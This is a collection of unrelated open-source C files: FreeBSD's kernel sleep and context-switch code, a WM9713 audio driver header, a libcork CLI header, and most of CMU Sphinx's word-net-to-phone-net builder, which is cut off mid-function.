/*- * Copyright (c) 1982, 1986, 1990, 1991, 1993 * The Regents of the University of California. All rights reserved. * (c) UNIX System Laboratories, Inc. * All or some portions of this file are derived from material licensed * to the University of California by American Telephone and Telegraph * Co. or Unix System Laboratories, Inc. and are reproduced herein with * the permission of UNIX System Laboratories, Inc. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)kern_synch.c 8.9 (Berkeley) 5/19/95 */ #include <sys/cdefs.h> __FBSDID("$FreeBSD$"); #include "opt_ktrace.h" #include "opt_sched.h" #include <sys/param.h> #include <sys/systm.h> #include <sys/condvar.h> #include <sys/kdb.h> #include <sys/kernel.h> #include <sys/ktr.h> #include <sys/lock.h> #include <sys/mutex.h> #include <sys/proc.h> #include <sys/resourcevar.h> #include <sys/sched.h> #include <sys/sdt.h> #include <sys/signalvar.h> #include <sys/sleepqueue.h> #include <sys/smp.h> #include <sys/sx.h> #include <sys/sysctl.h> #include <sys/sysproto.h> #include <sys/vmmeter.h> #ifdef KTRACE #include <sys/uio.h> #include <sys/ktrace.h> #endif #include <machine/cpu.h> #define KTDSTATE(td) \ (((td)->td_inhibitors & TDI_SLEEPING) != 0 ? "sleep" : \ ((td)->td_inhibitors & TDI_SUSPENDED) != 0 ? "suspended" : \ ((td)->td_inhibitors & TDI_SWAPPED) != 0 ? "swapped" : \ ((td)->td_inhibitors & TDI_LOCK) != 0 ? "blocked" : \ ((td)->td_inhibitors & TDI_IWAIT) != 0 ? "iwait" : "yielding") static void synch_setup(void *dummy); SYSINIT(synch_setup, SI_SUB_KICK_SCHEDULER, SI_ORDER_FIRST, synch_setup, NULL); int hogticks; static uint8_t pause_wchan[MAXCPU]; static struct callout loadav_callout; struct loadavg averunnable = { {0, 0, 0}, FSCALE }; /* load average, of runnable procs */ /* * Constants for averages over 1, 5, and 15 minutes * when sampling at 5 second intervals. */ static fixpt_t cexp[3] = { 0.9200444146293232 * FSCALE, /* exp(-1/12) */ 0.9834714538216174 * FSCALE, /* exp(-1/60) */ 0.9944598480048967 * FSCALE, /* exp(-1/180) */ }; /* kernel uses `FSCALE', userland (SHOULD) use kern.fscale */ SYSCTL_INT(_kern, OID_AUTO, fscale, CTLFLAG_RD, SYSCTL_NULL_INT_PTR, FSCALE, ""); static void loadav(void *arg); SDT_PROVIDER_DECLARE(sched); SDT_PROBE_DEFINE(sched, , , preempt); static void sleepinit(void *unused) { hogticks = (hz / 10) * 2; /* Default only. */ init_sleepqueues(); } /* * vmem tries to lock the sleepq mutexes when free'ing kva, so make sure * it is available. */ SYSINIT(sleepinit, SI_SUB_KMEM, SI_ORDER_ANY, sleepinit, 0); /* * General sleep call. Suspends the current thread until a wakeup is * performed on the specified identifier. The thread will then be made * runnable with the specified priority. Sleeps at most sbt units of time * (0 means no timeout). If pri includes the PCATCH flag, let signals * interrupt the sleep, otherwise ignore them while sleeping. Returns 0 if * awakened, EWOULDBLOCK if the timeout expires. If PCATCH is set and a * signal becomes pending, ERESTART is returned if the current system * call should be restarted if possible, and EINTR is returned if the system * call should be interrupted by the signal (return EINTR). * * The lock argument is unlocked before the caller is suspended, and * re-locked before _sleep() returns. If priority includes the PDROP * flag the lock is not re-locked before returning. */ int _sleep(void *ident, struct lock_object *lock, int priority, const char *wmesg, sbintime_t sbt, sbintime_t pr, int flags) { struct thread *td; struct proc *p; struct lock_class *class; uintptr_t lock_state; int catch, pri, rval, sleepq_flags; WITNESS_SAVE_DECL(lock_witness); td = curthread; p = td->td_proc; #ifdef KTRACE if (KTRPOINT(td, KTR_CSW)) ktrcsw(1, 0, wmesg); #endif WITNESS_WARN(WARN_GIANTOK | WARN_SLEEPOK, lock, "Sleeping on \"%s\"", wmesg); KASSERT(sbt != 0 || mtx_owned(&Giant) || lock != NULL, ("sleeping without a lock")); KASSERT(p != NULL, ("msleep1")); KASSERT(ident != NULL && TD_IS_RUNNING(td), ("msleep")); if (priority & PDROP) KASSERT(lock != NULL && lock != &Giant.lock_object, ("PDROP requires a non-Giant lock")); if (lock != NULL) class = LOCK_CLASS(lock); else class = NULL; if (SCHEDULER_STOPPED()) { if (lock != NULL && priority & PDROP) class->lc_unlock(lock); return (0); } catch = priority & PCATCH; pri = priority & PRIMASK; /* * If we are already on a sleep queue, then remove us from that * sleep queue first. We have to do this to handle recursive * sleeps. */ if (TD_ON_SLEEPQ(td)) sleepq_remove(td, td->td_wchan); if ((uint8_t *)ident >= &pause_wchan[0] && (uint8_t *)ident <= &pause_wchan[MAXCPU - 1]) sleepq_flags = SLEEPQ_PAUSE; else sleepq_flags = SLEEPQ_SLEEP; if (catch) sleepq_flags |= SLEEPQ_INTERRUPTIBLE; sleepq_lock(ident); CTR5(KTR_PROC, "sleep: thread %ld (pid %ld, %s) on %s (%p)", td->td_tid, p->p_pid, td->td_name, wmesg, ident); if (lock == &Giant.lock_object) mtx_assert(&Giant, MA_OWNED); DROP_GIANT(); if (lock != NULL && lock != &Giant.lock_object && !(class->lc_flags & LC_SLEEPABLE)) { WITNESS_SAVE(lock, lock_witness); lock_state = class->lc_unlock(lock); } else /* GCC needs to follow the Yellow Brick Road */ lock_state = -1; /* * We put ourselves on the sleep queue and start our timeout * before calling thread_suspend_check, as we could stop there, * and a wakeup or a SIGCONT (or both) could occur while we were * stopped without resuming us. Thus, we must be ready for sleep * when cursig() is called. If the wakeup happens while we're * stopped, then td will no longer be on a sleep queue upon * return from cursig(). */ sleepq_add(ident, lock, wmesg, sleepq_flags, 0); if (sbt != 0) sleepq_set_timeout_sbt(ident, sbt, pr, flags); if (lock != NULL && class->lc_flags & LC_SLEEPABLE) { sleepq_release(ident); WITNESS_SAVE(lock, lock_witness); lock_state = class->lc_unlock(lock); sleepq_lock(ident); } if (sbt != 0 && catch) rval = sleepq_timedwait_sig(ident, pri); else if (sbt != 0) rval = sleepq_timedwait(ident, pri); else if (catch) rval = sleepq_wait_sig(ident, pri); else { sleepq_wait(ident, pri); rval = 0; } #ifdef KTRACE if (KTRPOINT(td, KTR_CSW)) ktrcsw(0, 0, wmesg); #endif PICKUP_GIANT(); if (lock != NULL && lock != &Giant.lock_object && !(priority & PDROP)) { class->lc_lock(lock, lock_state); WITNESS_RESTORE(lock, lock_witness); } return (rval); } int msleep_spin_sbt(void *ident, struct mtx *mtx, const char *wmesg, sbintime_t sbt, sbintime_t pr, int flags) { struct thread *td; struct proc *p; int rval; WITNESS_SAVE_DECL(mtx); td = curthread; p = td->td_proc; KASSERT(mtx != NULL, ("sleeping without a mutex")); KASSERT(p != NULL, ("msleep1")); KASSERT(ident != NULL && TD_IS_RUNNING(td), ("msleep")); if (SCHEDULER_STOPPED()) return (0); sleepq_lock(ident); CTR5(KTR_PROC, "msleep_spin: thread %ld (pid %ld, %s) on %s (%p)", td->td_tid, p->p_pid, td->td_name, wmesg, ident); DROP_GIANT(); mtx_assert(mtx, MA_OWNED | MA_NOTRECURSED); WITNESS_SAVE(&mtx->lock_object, mtx); mtx_unlock_spin(mtx); /* * We put ourselves on the sleep queue and start our timeout. */ sleepq_add(ident, &mtx->lock_object, wmesg, SLEEPQ_SLEEP, 0); if (sbt != 0) sleepq_set_timeout_sbt(ident, sbt, pr, flags); /* * Can't call ktrace with any spin locks held so it can lock the * ktrace_mtx lock, and WITNESS_WARN considers it an error to hold * any spin lock. Thus, we have to drop the sleepq spin lock while * we handle those requests. This is safe since we have placed our * thread on the sleep queue already. */ #ifdef KTRACE if (KTRPOINT(td, KTR_CSW)) { sleepq_release(ident); ktrcsw(1, 0, wmesg); sleepq_lock(ident); } #endif #ifdef WITNESS sleepq_release(ident); WITNESS_WARN(WARN_GIANTOK | WARN_SLEEPOK, NULL, "Sleeping on \"%s\"", wmesg); sleepq_lock(ident); #endif if (sbt != 0) rval = sleepq_timedwait(ident, 0); else { sleepq_wait(ident, 0); rval = 0; } #ifdef KTRACE if (KTRPOINT(td, KTR_CSW)) ktrcsw(0, 0, wmesg); #endif PICKUP_GIANT(); mtx_lock_spin(mtx); WITNESS_RESTORE(&mtx->lock_object, mtx); return (rval); } /* * pause() delays the calling thread by the given number of system ticks. * During cold bootup, pause() uses the DELAY() function instead of * the tsleep() function to do the waiting. The "timo" argument must be * greater than or equal to zero. A "timo" value of zero is equivalent * to a "timo" value of one. */ int pause_sbt(const char *wmesg, sbintime_t sbt, sbintime_t pr, int flags) { KASSERT(sbt >= 0, ("pause: timeout must be >= 0")); /* silently convert invalid timeouts */ if (sbt == 0) sbt = tick_sbt; if (cold || kdb_active || SCHEDULER_STOPPED()) { /* * We delay one second at a time to avoid overflowing the * system specific DELAY() function(s): */ while (sbt >= SBT_1S) { DELAY(1000000); sbt -= SBT_1S; } /* Do the delay remainder, if any */ sbt = howmany(sbt, SBT_1US); if (sbt > 0) DELAY(sbt); return (0); } return (_sleep(&pause_wchan[curcpu], NULL, 0, wmesg, sbt, pr, flags)); } /* * Make all threads sleeping on the specified identifier runnable. */ void wakeup(void *ident) { int wakeup_swapper; sleepq_lock(ident); wakeup_swapper = sleepq_broadcast(ident, SLEEPQ_SLEEP, 0, 0); sleepq_release(ident); if (wakeup_swapper) { KASSERT(ident != &proc0, ("wakeup and wakeup_swapper and proc0")); kick_proc0(); } } /* * Make a thread sleeping on the specified identifier runnable. * May wake more than one thread if a target thread is currently * swapped out. */ void wakeup_one(void *ident) { int wakeup_swapper; sleepq_lock(ident); wakeup_swapper = sleepq_signal(ident, SLEEPQ_SLEEP, 0, 0); sleepq_release(ident); if (wakeup_swapper) kick_proc0(); } static void kdb_switch(void) { thread_unlock(curthread); kdb_backtrace(); kdb_reenter(); panic("%s: did not reenter debugger", __func__); } /* * The machine independent parts of context switching. */ void mi_switch(int flags, struct thread *newtd) { uint64_t runtime, new_switchtime; struct thread *td; td = curthread; /* XXX */ THREAD_LOCK_ASSERT(td, MA_OWNED | MA_NOTRECURSED); KASSERT(!TD_ON_RUNQ(td), ("mi_switch: called by old code")); #ifdef INVARIANTS if (!TD_ON_LOCK(td) && !TD_IS_RUNNING(td)) mtx_assert(&Giant, MA_NOTOWNED); #endif KASSERT(td->td_critnest == 1 || panicstr, ("mi_switch: switch in a critical section")); KASSERT((flags & (SW_INVOL | SW_VOL)) != 0, ("mi_switch: switch must be voluntary or involuntary")); KASSERT(newtd != curthread, ("mi_switch: preempting back to ourself")); /* * Don't perform context switches from the debugger. */ if (kdb_active) kdb_switch(); if (SCHEDULER_STOPPED()) return; if (flags & SW_VOL) { td->td_ru.ru_nvcsw++; td->td_swvoltick = ticks; } else { td->td_ru.ru_nivcsw++; td->td_swinvoltick = ticks; } #ifdef SCHED_STATS SCHED_STAT_INC(sched_switch_stats[flags & SW_TYPE_MASK]); #endif /* * Compute the amount of time during which the current * thread was running, and add that to its total so far. */ new_switchtime = cpu_ticks(); runtime = new_switchtime - PCPU_GET(switchtime); td->td_runtime += runtime; td->td_incruntime += runtime; PCPU_SET(switchtime, new_switchtime); td->td_generation++; /* bump preempt-detect counter */ PCPU_INC(cnt.v_swtch); PCPU_SET(switchticks, ticks); CTR4(KTR_PROC, "mi_switch: old thread %ld (td_sched %p, pid %ld, %s)", td->td_tid, td_get_sched(td), td->td_proc->p_pid, td->td_name); #if (KTR_COMPILE & KTR_SCHED) != 0 if (TD_IS_IDLETHREAD(td)) KTR_STATE1(KTR_SCHED, "thread", sched_tdname(td), "idle", "prio:%d", td->td_priority); else KTR_STATE3(KTR_SCHED, "thread", sched_tdname(td), KTDSTATE(td), "prio:%d", td->td_priority, "wmesg:\"%s\"", td->td_wmesg, "lockname:\"%s\"", td->td_lockname); #endif SDT_PROBE0(sched, , , preempt); sched_switch(td, newtd, flags); KTR_STATE1(KTR_SCHED, "thread", sched_tdname(td), "running", "prio:%d", td->td_priority); CTR4(KTR_PROC, "mi_switch: new thread %ld (td_sched %p, pid %ld, %s)", td->td_tid, td_get_sched(td), td->td_proc->p_pid, td->td_name); /* * If the last thread was exiting, finish cleaning it up. */ if ((td = PCPU_GET(deadthread))) { PCPU_SET(deadthread, NULL); thread_stash(td); } } /* * Change thread state to be runnable, placing it on the run queue if * it is in memory. If it is swapped out, return true so our caller * will know to awaken the swapper. */ int setrunnable(struct thread *td) { THREAD_LOCK_ASSERT(td, MA_OWNED); KASSERT(td->td_proc->p_state != PRS_ZOMBIE, ("setrunnable: pid %d is a zombie", td->td_proc->p_pid)); switch (td->td_state) { case TDS_RUNNING: case TDS_RUNQ: return (0); case TDS_INHIBITED: /* * If we are only inhibited because we are swapped out * then arange to swap in this process. Otherwise just return. */ if (td->td_inhibitors != TDI_SWAPPED) return (0); /* FALLTHROUGH */ case TDS_CAN_RUN: break; default: printf("state is 0x%x", td->td_state); panic("setrunnable(2)"); } if ((td->td_flags & TDF_INMEM) == 0) { if ((td->td_flags & TDF_SWAPINREQ) == 0) { td->td_flags |= TDF_SWAPINREQ; return (1); } } else sched_wakeup(td); return (0); } /* * Compute a tenex style load average of a quantity on * 1, 5 and 15 minute intervals. */ static void loadav(void *arg) { int i, nrun; struct loadavg *avg; nrun = sched_load(); avg = &averunnable; for (i = 0; i < 3; i++) avg->ldavg[i] = (cexp[i] * avg->ldavg[i] + nrun * FSCALE * (FSCALE - cexp[i])) >> FSHIFT; /* * Schedule the next update to occur after 5 seconds, but add a * random variation to avoid synchronisation with processes that * run at regular intervals. */ callout_reset_sbt(&loadav_callout, SBT_1US * (4000000 + (int)(random() % 2000001)), SBT_1US, loadav, NULL, C_DIRECT_EXEC | C_PREL(32)); } /* ARGSUSED */ static void synch_setup(void *dummy) { callout_init(&loadav_callout, 1); /* Kick off timeout driven events by calling first time. */ loadav(NULL); } int should_yield(void) { return ((u_int)ticks - (u_int)curthread->td_swvoltick >= hogticks); } void maybe_yield(void) { if (should_yield()) kern_yield(PRI_USER); } void kern_yield(int prio) { struct thread *td; td = curthread; DROP_GIANT(); thread_lock(td); if (prio == PRI_USER) prio = td->td_user_pri; if (prio >= 0) sched_prio(td, prio); mi_switch(SW_VOL | SWT_RELINQUISH, NULL); thread_unlock(td); PICKUP_GIANT(); } /* * General purpose yield system call. */ int sys_yield(struct thread *td, struct yield_args *uap) { thread_lock(td); if (PRI_BASE(td->td_pri_class) == PRI_TIMESHARE) sched_prio(td, PRI_MAX_TIMESHARE); mi_switch(SW_VOL | SWT_RELINQUISH, NULL); thread_unlock(td); td->td_retval[0] = 0; return (0); }
{ "language": "C" }
/* SPDX-License-Identifier: GPL-2.0 */ /* * wm9713.h -- WM9713 Soc Audio driver */ #ifndef _WM9713_H #define _WM9713_H /* clock inputs */ #define WM9713_CLKA_PIN 0 #define WM9713_CLKB_PIN 1 /* clock divider ID's */ #define WM9713_PCMCLK_DIV 0 #define WM9713_CLKA_MULT 1 #define WM9713_CLKB_MULT 2 #define WM9713_HIFI_DIV 3 #define WM9713_PCMBCLK_DIV 4 #define WM9713_PCMCLK_PLL_DIV 5 #define WM9713_HIFI_PLL_DIV 6 /* Calculate the appropriate bit mask for the external PCM clock divider */ #define WM9713_PCMDIV(x) ((x - 1) << 8) /* Calculate the appropriate bit mask for the external HiFi clock divider */ #define WM9713_HIFIDIV(x) ((x - 1) << 12) /* MCLK clock mulitipliers */ #define WM9713_CLKA_X1 (0 << 1) #define WM9713_CLKA_X2 (1 << 1) #define WM9713_CLKB_X1 (0 << 2) #define WM9713_CLKB_X2 (1 << 2) /* MCLK clock MUX */ #define WM9713_CLK_MUX_A (0 << 0) #define WM9713_CLK_MUX_B (1 << 0) /* Voice DAI BCLK divider */ #define WM9713_PCMBCLK_DIV_1 (0 << 9) #define WM9713_PCMBCLK_DIV_2 (1 << 9) #define WM9713_PCMBCLK_DIV_4 (2 << 9) #define WM9713_PCMBCLK_DIV_8 (3 << 9) #define WM9713_PCMBCLK_DIV_16 (4 << 9) #endif
{ "language": "C" }
/* -*- coding: utf-8 -*- * ---------------------------------------------------------------------- * Copyright © 2012, RedJack, LLC. * All rights reserved. * * Please see the COPYING file in this distribution for license * details. * ---------------------------------------------------------------------- */ #ifndef LIBCORK_CLI_H #define LIBCORK_CLI_H /*** include all of the parts ***/ #include <libcork/cli/commands.h> #endif /* LIBCORK_CLI_H */
{ "language": "C" }
/* ==================================================================== * Copyright (c) 1996-2000 Carnegie Mellon University. All rights * reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. The names "Sphinx" and "Carnegie Mellon" must not be used to * endorse or promote products derived from this software without * prior written permission. To obtain permission, contact * sphinx@cs.cmu.edu. * * 4. Products derived from this software may not be called "Sphinx" * nor may "Sphinx" appear in their names without prior written * permission of Carnegie Mellon University. To obtain permission, * contact sphinx@cs.cmu.edu. * * 5. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by Carnegie * Mellon University (http://www.speech.cs.cmu.edu/)." * * THIS SOFTWARE IS PROVIDED BY CARNEGIE MELLON UNIVERSITY ``AS IS'' AND * ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CARNEGIE MELLON UNIVERSITY * NOR ITS EMPLOYEES BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * ==================================================================== * */ /* * wnet2pnet.c -- Build a triphone HMM net from a given word net. * * * HISTORY * * 05-Nov-1997 M K Ravishankar (rkm@cs.cmu.edu) at Carnegie Mellon University * Started. */ #include <libutil/libutil.h> #include <libmisc/libmisc.h> #include "senone.h" #include "wnet2pnet.h" static glist_t pnet; static int32 n_pnode, n_plink; /* * Additional data needed at each word node to build the phone net. */ typedef struct wnode_data_s { wnode_t *wnode; glist_t *lc; /* lc[p] = list of initial pnode_t with left context = p */ glist_t *rc; /* rc[p] = list of final pnode_t with right context = p */ } wnode_data_t; static void link_pnodes (pnode_t *src, pnode_t *dst) { plink_t *pl; pl = (plink_t *) mymalloc (sizeof(plink_t)); pl->dst = dst; src->succ = glist_add_ptr (src->succ, (void *)pl); n_plink++; } static plink_t *plink_lookup (pnode_t *src, pnode_t *dst) { gnode_t *gn; plink_t *pl; for (gn = src->succ; gn; gn = gn->next) { pl = (plink_t *) gnode_ptr(gn); if (pl->dst == dst) return pl; } return NULL; } /* * Lookup the list of pnodes for an HMM with the same underlying model as the given * pid. Return pointer if found, NULL otherwise. */ static pnode_t *plist_lookup_hmm (mdef_t *mdef, glist_t plist, s3pid_t pid) { gnode_t *gn; pnode_t *pn; for (gn = plist; gn; gn = gnode_next(gn)) { pn = (pnode_t *) gnode_ptr(gn); if (mdef_hmm_cmp (mdef, pn->hmm.pid, pid) == 0) return pn; } return NULL; } static pnode_t *pnode_create (mdef_t *mdef, s3pid_t pid, s3wid_t wid, int32 pos) { pnode_t *pn; pn = (pnode_t *) mymalloc (sizeof(pnode_t)); pn->wid = wid; pn->pos = pos; pn->hmm.state = (hmm_state_t *) ckd_calloc (mdef->n_emit_state, sizeof(hmm_state_t)); pn->hmm.pid = pid; pn->succ = NULL; pnet = glist_add_ptr (pnet, (void *) pn); n_pnode++; return pn; } /* * Build HMM net for the given word. All the internal links are set up. But the net * is isolated, with no connections to any other word. However, wnode_data->{lc,rc} * are updated with the HMMs at the extreme ends (left and right) so that one can later * complete the entire net. */ static void wnode2pnet_build (mdef_t *mdef, dict_t *dict, wnode_data_t *wnode_data) { uint8 *lc, *rc; wnode_t *wn; gnode_t *gn, *gn2; wlink_t *wl; s3wid_t wid; s3pid_t pid; s3cipid_t ci, l, r; int32 pronlen; int32 i, j; glist_t p1list, p2list; pnode_t *pn, *prevpn; wn = wnode_data->wnode; /* Mark all the left and right context for this word node */ lc = (uint8 *) ckd_calloc (mdef->n_ciphone, sizeof(uint8)); rc = (uint8 *) ckd_calloc (mdef->n_ciphone, sizeof(uint8)); if (! wn->pred) { /* No predecessor, pick SILENCE_CIPHONE as left context */ lc[mdef->sil] = 1; } else { for (gn = wn->pred; gn; gn = gn->next) { wl = (wlink_t *) gnode_ptr(gn); wid = wl->dst->wid; /* Predecessor word id */ lc[dict_last_phone(dict, wid)] = 1; } } if (! wn->succ) { /* No successor, use SILENCE_CIPHONE as right context */ rc[mdef->sil] = 1; } else { for (gn = wn->succ; gn; gn = gn->next) { wl = (wlink_t *) gnode_ptr(gn); wid = wl->dst->wid; rc[dict_first_phone(dict, wid)] = 1; } } wnode_data->lc = (glist_t *) ckd_calloc (mdef->n_ciphone, sizeof(glist_t)); wnode_data->rc = (glist_t *) ckd_calloc (mdef->n_ciphone, sizeof(glist_t)); /* Create phone net for wn->wid */ wid = wn->wid; if ((pronlen = dict_pronlen (dict, wid)) > 1) { /* Multi-phone pronunciation; initial phone position, expand left contexts */ p1list = NULL; /* List of distinct HMMs allocated for leftmost phone */ ci = dict_pron(dict, wid, 0); r = dict_pron(dict, wid, 1); for (i = 0; i < mdef->n_ciphone; i++) { if (! lc[i]) continue; pid = mdef_phone_id_nearest (mdef, ci, (s3cipid_t)i, r, WORD_POSN_BEGIN); assert (IS_PID(pid)); if ((pn = plist_lookup_hmm (mdef, p1list, pid)) == NULL) { pn = pnode_create (mdef, pid, wid, 0); p1list = glist_add_ptr (p1list, (void *) pn); } wnode_data->lc[i] = glist_add_ptr (wnode_data->lc[i], (void *) pn); } /* Intermediate phones; known left/right contexts */ for (i = 1; i < pronlen-1; i++) { p2list = NULL; /* Create HMM node for phone position i */ ci = dict_pron (dict, wid, i); l = dict_pron (dict, wid, i-1); r = dict_pron (dict, wid, i+1); pid = mdef_phone_id_nearest (mdef, ci, l, r, WORD_POSN_INTERNAL); assert (IS_PID(pid)); pn = pnode_create (mdef, pid, wid, i); p2list = glist_add_ptr (p2list, (void *) pn); /* Link from previous nodes */ for (gn = p1list; gn; gn = gn->next) { prevpn = (pnode_t *) gnode_ptr(gn); link_pnodes (prevpn, pn); } glist_free (p1list); p1list = p2list; } /* Final phone position; expand right context (for the ones present) */ p2list = NULL; ci = dict_pron(dict, wid, pronlen-1); l = dict_pron(dict, wid, pronlen-2); for (i = 0; i < mdef->n_ciphone; i++) { if (! rc[i]) continue; pid = mdef_phone_id_nearest (mdef, ci, l, (s3cipid_t)i, WORD_POSN_END); assert (IS_PID(pid)); if ((pn = plist_lookup_hmm (mdef, p2list, pid)) == NULL) { pn = pnode_create (mdef, pid, wid, pronlen-1); p2list = glist_add_ptr (p2list, (void *) pn); } wnode_data->rc[i] = glist_add_ptr (wnode_data->rc[i], (void *) pn); } /* Link from previous nodes */ for (gn = p1list; gn; gn = gn->next) { prevpn = (pnode_t *) gnode_ptr(gn); for (gn2 = p2list; gn2; gn2 = gn2->next) { pn = (pnode_t *) gnode_ptr(gn2); link_pnodes (prevpn, pn); } } glist_free (p1list); glist_free (p2list); } else { /* Single-phone word; handle left/right contexts simultaneously */ p1list = NULL; ci = dict_pron(dict, wid, 0); for (i = 0; i < mdef->n_ciphone; i++) { if (! lc[i]) continue; for (j = 0; j < mdef->n_ciphone; j++) { if (! rc[j]) continue; pid = mdef_phone_id_nearest (mdef, ci, (s3cipid_t)i, (s3cipid_t)j, WORD_POSN_SINGLE); assert (IS_PID(pid)); if ((pn = plist_lookup_hmm (mdef, p1list, pid)) == NULL) { pn = pnode_create (mdef, pid, wid, 0); p1list = glist_add_ptr (p1list, (void *) pn); } wnode_data->lc[i] = glist_add_ptr (wnode_data->lc[i], (void *) pn); wnode_data->rc[j] = glist_add_ptr (wnode_data->rc[j], (void *) pn); } } glist_free (p1list); } ckd_free (lc); ckd_free (rc); } /* * Build cross-word HMM links, taking phonetic context into account: * Let the last CIphone in src = l (i.e., the left context for dst), and * the first CIphone in dst = r (i.e., the right phonetic context for src). Then, * create links from the HMMs in the glist src->rc[r] to those in dst->lc[l]. But, * avoid creating duplicate links, since several entries in a glist may share the * same HMM. */ static void link_wnodes (dict_t *dict, wnode_data_t *src, wnode_data_t *dst) { s3cipid_t l, r; wnode_t *wn; gnode_t *gn1, *gn2; pnode_t *pn1, *pn2; /* Find the last phone for the source node (the left context for the destination) */ wn = src->wnode; l = dict_pron (dict, wn->wid, dict_pronlen(dict, wn->wid) - 1); /* Find the first phone for the dest. node (the right context for the source) */ wn = dst->wnode; r = dict_pron (dict, wn->wid, 0); /* Link each HMM in src->rc[r] to each in dst->lc[l] */ for (gn1 = src->rc[r]; gn1; gn1 = gn1->next) { pn1 = (pnode_t *) gnode_ptr(gn1); for (gn2 = dst->lc[l]; gn2; gn2 = gn2->next) { pn2 = (pnode_t *) gnode_ptr(gn2); /* Check if a link already exists */ if (! plink_lookup (pn1, pn2)) link_pnodes (pn1, pn2); } } } /* * Convert a wordnet into a phone net. */ glist_t wnet2pnet (mdef_t *mdef, dict_t *dict, glist_t wnet, wnode_t *wstart, wnode_t *wend, /* In: Dummy start/end anchors */ pnode_t **pstart, pnode_t **pend) /* Out: Dummy start/end anchors */ { gnode_t *gn, *gn2; wnode_t *wn; wlink_t *wl; int32 n, i, j; wnode_data_t *wnode_data; pnode_t *pn, *pn2; if (NOT_CIPID(mdef->sil)) E_FATAL("%s not defined\n", SILENCE_CIPHONE); pnet = NULL; n_pnode = 0; n_plink = 0; /* Allocate wnode_data_t prior to building the phone net */ n = glist_count (wnet) - 2; /* Skip wstart and wend */ if (n <= 0) { E_ERROR("Empty word net\n"); return NULL; } wnode_data = (wnode_data_t *) ckd_calloc (n, sizeof(wnode_data_t)); for (gn = wnet, i = 0; gn; gn = gn->next) { wn = (wnode_t *) gnode_ptr(gn); if ((wn == wstart) || (wn == wend)) continue; /* Skip the dummy start/end nodes */ wn->data = i; wnode_data[i].wnode = wn; wnode2pnet_build (mdef, dict, wnode_data+i); i++; } assert (i == n); /* Create links between the pnodes created for each word above */ for (i = 0; i < n; i++) { wn = wnode_data[i].wnode; for (gn = wn->succ; gn; gn = gn->next) { wl = (wlink_t *) gnode_ptr(gn); if ((wnode_t *)wl->dst != wend) link_wnodes (dict, wnode_data+i, wnode_data+(wl->dst->data)); } } /* Add dummy pnode at the beginning of the net */ pn = pnode_create (mdef, mdef->sil, BAD_WID, 0); /* Link it to initial phones of all successors of wstart */ for (gn = wstart->succ; gn; gn = gn->next) { wl = (wlink_t *) gnode_ptr(gn); i = wl->dst->data; for (j = 0; j < mdef->n_ciphone; j++) { for (gn2 = wnode_data[i].lc[j]; gn2; gn2 = gn2->next) { pn2 = (pnode_t *) gnode_ptr(gn2); if (! plink_lookup (pn, pn2)) link_pnodes (pn, pn2); } } } *pstart = pn; /* Add dummy pnode at the end of the net */ pn = pnode_create (mdef, mdef->sil, BAD_WID, 0); /* Link from the final phones of all predecessors of wend to pn */ for (gn = wend->pred; gn; gn = gn->next) { wl = (wlink_t *) gnode_ptr(gn); i = wl->dst->data; for (j = 0; j < mdef->n_ciphone; j++) { for (gn2 = wnode_data[i].rc[j]; gn2; gn2 = gn2->next) { pn2 = (pnode_t *) gnode_ptr(gn2); if (! plink_lookup (pn2, pn)) link_pnodes (pn2, pn); } } } *pend = pn; /* Free working data */ for (i = 0; i < n; i++) { for (j = 0; j < mdef->n_ciphone; j++) { glist_free (wnode_data[i].lc[j]); glist_free (wnode_data[i].rc[j]); } ckd_free (wnode_data[i].lc); ckd_free (wnode_data[i].rc); } ckd_free (wnode_data); E_INFO("%d pnodes, %d plinks\n", n_pnode, n_plink); return pnet; } static void pnode_free (void *data) { pnode_t *pn; pn = (pnode_t *) data; ckd_free (pn->hmm.state); glist_myfree (pn->succ, sizeof(plink_t)); } void pnet_free (glist_t pnet) { glist_apply_ptr (pnet, pnode_free); glist_myfree (pnet, sizeof(pnode_t)); } void pnet_set_senactive (mdef_t *m, glist_t 